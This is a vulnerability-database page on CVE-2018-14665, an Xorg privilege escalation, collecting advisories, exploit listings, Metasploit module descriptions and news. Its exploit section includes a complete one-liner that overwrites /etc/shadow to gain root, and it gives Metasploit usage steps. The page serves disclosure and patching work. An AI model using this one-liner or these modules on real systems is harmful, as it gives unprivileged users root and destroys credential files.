7.2
CVSSv2

CVE-2018-14665

Published: 25/10/2018 Updated: 22/10/2019
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
CVSS v3 Base Score: 6.6 | Impact Score: 5.9 | Exploitability Score: 0.7
VMScore: 866
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

A flaw was found in xorg-x11-server prior to 1.20.3. An incorrect permission check for -modulepath and -logfile options when starting Xorg. X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges.

Vulnerability Trend

Vendor Advisories

Synopsis Important: xorg-x11-server security update Type/Severity Security Advisory: Important Topic An update for xorg-x11-server is now available for Red Hat Enterprise Linux 7Red Hat Product Security has rated this update as having a security impact of Important A Common Vulnerability Scoring System (C ...
XOrg X server could be made to overwrite files as the administrator ...
Narendra Shinde discovered that incorrect command-line parameter validation in the Xorg X server may result in arbitary file overwrite, which can result in privilege escalation For the stable distribution (stretch), this problem has been fixed in version 2:1192-1+deb9u4 We recommend that you upgrade your xorg-server packages For the detailed s ...
An incorrect permission check for -modulepath and -logfile options when starting Xorg X server allows unprivileged users with the ability to log in to the system via physical console to escalate their privileges and run arbitrary code under root privileges ...
Arch Linux Security Advisory ASA-201810-15 ========================================== Severity: High Date : 2018-10-29 CVE-ID : CVE-2018-14665 Package : xorg-server Type : privilege escalation Remote : Yes Link : securityarchlinuxorg/AVG-788 Summary ======= The package xorg-server before version 1203-1 is vulnerable to pri ...
Incorrect command-line parameter validation in the Xorg X server can lead to privilege elevation and/or arbitrary files overwrite, when the X server is installed with the setuid bit set and unprivileged users have the ability to log in to the system via physical console The -modulepath argument can be used to specify an insecure path to modules t ...
IBM Dynamic System Analysis (DSA) Preboot has addressed the following vulnerabilities in xorg-x11 ...
Oracle Solaris Third Party Bulletin - October 2018 Description The Oracle Solaris Third Party Bulletin announces patches for one or more security vulnerabilities fixed in third party software that is included in Oracle Solaris distributions Starting January 20, 2015, Third Party Bulletins are released on the same day when Oracle Critic ...
Oracle Linux Bulletin - October 2018 Description The Oracle Linux Bulletin lists all CVEs that had been resolved and announced in Oracle Linux Security Advisories (ELSA) in the last one month prior to the release of the bulletin Oracle Linux Bulletins are published on the same day as Oracle Critical ...

Exploits

# Exploit Title: xorg-x11-server < 1201 - Local Privilege Escalation (RHEL 7) # Date: 2018-11-07 # Exploit Author: @bolonobolo # Vendor Homepage: wwwxorg/ # Version: 1195 # Tested on: RHEL 73 && 75 # CVE : CVE-2018-14665 # Explanation # The only condition that have to be met for this PE to work via SSH, is that the legiti ...
# Exploit Title: xorg-x11-server 1203 - Privilege Escalation # Date: 2018-10-27 # Exploit Author: Marco Ivaldi # Vendor Homepage: wwwxorg/ # Version: xorg-x11-server 1190 - 1202 # Tested on: OpenBSD 63 and 64 # CVE : CVE-2018-14665 # raptor_xorgasm #!/bin/sh # # raptor_xorgasm - xorg-x11-server LPE via OpenBSD's cron # Copyrigh ...
## # This module requires Metasploit: metasploitcom/download # Current source: githubcom/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::File include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' ...
#CVE-2018-14665 - a LPE exploit via Xorg fits in a tweet cd /etc; Xorg -fp "root::16431:0:99999:7:::" -logfile shadow :1;su Overwrite shadow (or any) file on most Linux, get root privileges *BSD and any other Xorg desktop also affected #!/bin/sh # local privilege escalation in X11 currently # unpatched in OpenBSD 64 stable - ex ...

Mailing Lists

This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1190 up to 1203 A permission check flaw exists for -modulepath and -logfile options when starting Xorg This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges This Metasplo ...
This Metasploit module attempts to gain root privileges with SUID Xorg X11 server versions 1190 up to 1203 A permission check flaw exists for -modulepath and -logfile options when starting Xorg This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges This module h ...
xorg-x11-server versions prior to 1203 local privilege escalation exploit ...
Xorg X11 server on AIX local privilege escalation exploit ...
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-4328-1 security () debian org wwwdebianorg/security/ Moritz Muehlenhoff October 25, 2018 wwwdebianorg/security/faq ...
This Metasploit module has been tested with AIX 71 and 72, and should also work with 61 Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges All currently logged in users need to be included when /etc/passwd is overwritten, els ...
xorg-x11-server version 1203 privilege escalation exploit ...
xorg-x11-server versions prior to 1201 local privilege escalation exploit ...
xorg-x11-server versions prior to 1203 modulepath local privilege escalation exploit ...

Metasploit Modules

Xorg X11 Server Local Privilege Escalation

WARNING: Successful execution of this module results in /etc/passwd being overwritten. This module is a port of the OpenBSD X11 Xorg exploit to run on AIX. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with AIX 7.1 and 7.2, and should also work with 6.1. Due to permission restrictions of the crontab in AIX, this module does not use cron, and instead overwrites /etc/passwd in order to create a new user with root privileges. All currently logged in users need to be included when /etc/passwd is overwritten, else AIX will throw 'Cannot get "LOGNAME" variable' when attempting to change user. The Xorg '-fp' parameter used in the OpenBSD exploit does not work on AIX, and is replaced by '-config', in conjuction with ANSI-C quotes to inject newlines when overwriting /etc/passwd.

msf > use exploit/aix/local/xorg_x11_server
msf exploit(xorg_x11_server) > show targets
    ...targets...
msf exploit(xorg_x11_server) > set TARGET < target-id >
msf exploit(xorg_x11_server) > show options
    ...show and set options...
msf exploit(xorg_x11_server) > exploit
Xorg X11 Server SUID privilege escalation

This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708). CentOS default install will require console auth for the users session. Cron launches the payload so if Selinux is enforcing exploitation may still be possible, but the module will bail. Xorg must have SUID permissions and may not start if running. On exploitation a crontab.old backup file will be created by Xorg. This module will remove the .old file and restore crontab after successful exploitation. Failed exploitation may result in a corrupted crontab. On successful exploitation artifacts will be created consistant with starting Xorg and running a cron.

msf > use exploit/multi/local/xorg_x11_suid_server
      msf exploit(xorg_x11_suid_server) > show targets
            ...targets...
      msf exploit(xorg_x11_suid_server) > set TARGET <target-id>
      msf exploit(xorg_x11_suid_server) > show options
            ...show and set options...
      msf exploit(xorg_x11_suid_server) > exploit
Xorg X11 Server SUID modulepath Privilege Escalation

This module attempts to gain root privileges with SUID Xorg X11 server versions 1.19.0 < 1.20.3. A permission check flaw exists for -modulepath and -logfile options when starting Xorg. This allows unprivileged users that can start the server the ability to elevate privileges and run arbitrary code under root privileges. This module has been tested with CentOS 7 (1708). CentOS default install will require console auth for the users session. Xorg must have SUID permissions and may not start if running. On successful exploitation artifacts will be created consistant with starting Xorg.

msf > use exploit/multi/local/xorg_x11_suid_server_modulepath
msf exploit(xorg_x11_suid_server_modulepath) > show targets
    ...targets...
msf exploit(xorg_x11_suid_server_modulepath) > set TARGET < target-id >
msf exploit(xorg_x11_suid_server_modulepath) > show options
    ...show and set options...
msf exploit(xorg_x11_suid_server_modulepath) > exploit

Github Repositories

Reporting This module requires Metasploit: metasploitcom/download welcome to this page Ethical hacking Khdira class MetasploitModule &lt; Msf::Exploit::Local Rank = GoodRanking include Msf::Exploit::EXE include Msf::Exploit::FileDropper include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System def init

OpenBsd_CVE-2018-14665

CVE-2018-14665 0x00 简介 印度安全研究员Narendra Shinde在XOrg Server软件包中发现了一个普通账号提权root的高危漏洞(CVE-2018-14665),它影响了主要的Linux发行版,包括OpenBSD,Debian,Ubuntu,CentOS,Red Hat和Fedora。 Xorg X项目提供了X Window系统的开源实现(也就是X11,或简称X,它是位图显示的窗口系统

CVE-2018-14665 Here you can find my analisys and PoC for most used Linux distribution For now i started from Redhat, this is the link for the official RHSA RHSA-2018:3410

Next-Generation Linux Kernel Exploit Suggester

Linux Exploit Suggester 2 Next-generation exploit suggester based on Linux_Exploit_Suggester Key Improvements Include: More exploits! (Last updated: March 27, 2019) Option to download exploit code directly from Exploit DB Accurate wildcard matching This expands the scope of searchable exploits Output colorization for easy viewing And more to come! This script is extremely

exploits and proof-of-concept vulnerability demonstration files from the team at Hacker House

Exploits Exploits and proof-of-concept code from the team at Hacker House Filename Description AirWatchMDMJailbreakBypasstxt Bypass jailbreak detection on mobile device management AirWatch for IOS AIX-0daystxt AIX 42 local root vulnerabilities amanda-amstartxt Advanced Maryland Automatic Network Disk Archiver local root privilege escalation exploit amanda-back

Our xorg-kit :)

xorg-kit 119-prime branch Xorg-kit is an overlay containing all core ebuilds related to xorg for Funtoo Linux It is designed to exist on users systems as an overlay, providing the ability for users to control what branch of xorg-kit they are using It is designed to be a part of the Funtoo Linux kits system The 119-prime branch of xorg-kit is the current, stable curated bra

项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 相关资源列表 mitre-attackgithubio/ mitre科技机构对

A handy collection of my public exploits, all in one place.

exploits "You can't argue with a root shell" -- Felix "FX" Lindner Linux raptor_chownc Linux 26x &lt; 267-rc3 (CVE-2004-0497) Missing DAC controls in sys_chown() on Linux raptor_prctlc Linux 26x from 2613 up to versions before 26174 (CVE-2006-2451) Suid_dumpable bug raptor_prctl2c Linux 26x from 2613 up to versions bef

Localroot Compile

Localroot Exploit This repository is a place where Localroot has been compiled and tested Linux Kernel Exploit with Compile #CVE  #Description  #Kernels Linux kernel XFRM Subsystem UAF [3x - 5x kernels] (Ubuntu 1404 / 1604 Server 44 LTS kernels, CentOS 8 418 kernels, Red Hat Enterprise Linux 4 418 kernels, Ubuntu 1804 Server LTS 415 kernels) CVE-2020-72

信息收集

RedTeam 信息收集 项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 另一个专门扫描破解的项目 另一个红队资

“网址”传输助手,记载一下平时用到好的在线网址。

Resource-list author:Echocipher mail:echocipher@163com blog:echociphergithubio 项目起因来源于看到别人分享的blog链接大全,于是参考了一下其中的内容形成了本项目,如果侵权,敬请告知。整理了格式,添加了一些自己平时会用到的内容,难免重复或者疏漏,如果您有推荐的相关内容或者其

2019年红队资源链接,资源不是本人整理出来,来自互联网,因为流传的少,特意在此做个备份,做个分享。

项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 相关资源列表 mitre-attackgithubio/ mitre科技机构对

Red-Team Attack Guid

项目简介 项目用于收集和归纳Red Team的以下几个方面 Red Team攻击思维 Red Team攻击工具 Red Team攻击方法 精华内容 mitre-attackgithubio/ mitre科技机构对攻击技术的总结wiki huntingdaygithubio MITRE | ATT&amp;CK 中文站 arxivorg 康奈尔大学(Cornell University)开放文档 wwwowas

相关资源列表 mitre-attackgithubio/ mitre 科技机构对攻击技术的总结 wiki huntingdaygithubio MITRE | ATT&amp;CK 中文站 arxivorg 康奈尔大学(Cornell University)开放文档 wwwowasporgcn/owasp-project/owasp-things OWASP 项目 wwwirongeekcom/iphp?page=security/hackingillustrated 国内外安全大会

日常积累的一些红队工具及自己写的脚本,更偏向于一些diy的好用的工具,并不是一些比较常用的msf/awvs/xray这种

redtool 日常积累的一些红队工具及自己写的脚本,更偏向于一些diy的好用的工具,并不是一些比较常用的msf/awvs/xray这种,缓慢积累中 说明 文件名 说明 cve-2017-10271py 漏洞poc cve-2020-0796-scannerzip 漏洞扫描器 HTTP代码爬取zip http代理池中爬取可用代理 Layer子域名挖掘机zip 子域名

项目简介 一个 Red Team 攻击的生命周期,整个生命周期包括: 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、在所有攻击结束之后清理并退出战场。 相关资源列表 mitre-attackgithubio/ mitre科技机构对

项目简介 信息收集、攻击尝试获得权限、持久性控制、权限提升、网络信息收集、横向移动、数据分析(在这个基础上再做持久化控制)、擦痕迹。 安全相关资源列表 arxivorg 康奈尔大学(Cornell University)开放文档 githubcom/sindresorhus/awesome awesome系列 wwwowasporgcn/owasp-pr

PoC in GitHub 2020 CVE-2020-0014 It is possible for a malicious application to construct a TYPE_TOAST window manually and make that window clickable This could lead to a local escalation of privilege with no additional execution privileges needed User action is needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Android-10Android ID: A-1286745

PoC auto collect from GitHub.

PoC in GitHub 2020 CVE-2020-0022 In reassemble_and_dispatch of packet_fragmentercc, there is possible out of bounds write due to an incorrect bounds calculation This could lead to remote code execution over Bluetooth with no additional execution privileges needed User interaction is not needed for exploitationProduct: AndroidVersions: Android-80 Android-81 Android-9 Andr

Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out current Contents CVE-2011-2856 CVE-2011-3243 CVE-2013-2618 CVE-2013-6632 CVE-2014-1701 CVE-2014-1705 CVE-2014-1747 CVE-2014-3176 CVE-2014-6332 CVE-2014-7927 CVE-2014-7928 CVE-2015-0072 CVE-2015-0235 CVE-2015-0240 CVE-2015-1233 CVE-2015-1242 CVE-2015-1268 CV

Awesome CVE PoC A curated list of CVE PoCs Here is a collection about Proof of Concepts of Common Vulnerabilities and Exposures, and you may also want to check out awesome-web-security Please read the contribution guidelines before contributing This repo is full of PoCs for CVEs If you enjoy this awesome list and would like to support it, check out my Patreon page :

Recent Articles

Trivial Bug in X.Org Gives Root Permission on Linux and BSD Systems
BleepingComputer • Ionut Ilascu • 26 Oct 2018

A vulnerability that is trivial to exploit allows privilege escalation to root level on Linux and BSD distributions using X.Org server, the open source implementation of the X Window System that offers the graphical environment.
The flaw is now identified as CVE-2018-14665 (credited to security researcher Narendra Shinde). It has been present in xorg-server for two years, since version 1.19.0 and is exploitable by a limited user as long as the X server runs with elevated permissions.
...